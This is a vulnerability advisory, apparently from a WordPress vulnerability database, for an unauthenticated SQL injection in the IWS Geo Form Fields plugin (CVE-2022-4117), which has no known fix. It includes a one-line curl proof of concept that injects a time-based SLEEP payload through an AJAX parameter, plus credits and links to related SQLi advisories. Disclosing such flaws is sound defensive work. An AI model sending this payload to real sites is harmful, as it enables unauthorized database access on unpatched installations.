IWS – Geo Form Fields <= 1.0 – Unauthenticated SQLi | CVE 2022-4117 | Plugin Vulnerabilities

Description

The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.

Proof of Concept

Invoke the following curl command, which will induce a 5s delay:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=iws_gff_fetch_states' --data 'country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)'

Affects Plugins

iws-geo-form-fields

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

1fac3eb4-13c0-442d-b27c-7b7736208193

Timeline

Publicly Published

2022-11-30 (about 1 years ago)

Added

2022-11-30 (about 1 years ago)

Last Updated

2022-11-30 (about 1 years ago)

Other

Published

Title

Published

2024-02-20

Title

Fancy Product Designer < 6.1.5 - Admin+ SQL Injection

Published

2017-09-09

Title

WPHRM <= 1.0 - Authenticated SQL Injection

Published

2023-06-19

Title

MStore API < 3.9.8 - Unauthenticated Blind SQLi

Published

2014-08-01

Title

wp audio gallery playlist <= 0.12 - SQL Injection

Published

2021-03-15

Title

Tutor LMS < 1.7.7 - SQL Injection via tutor_mark_answer_as_correct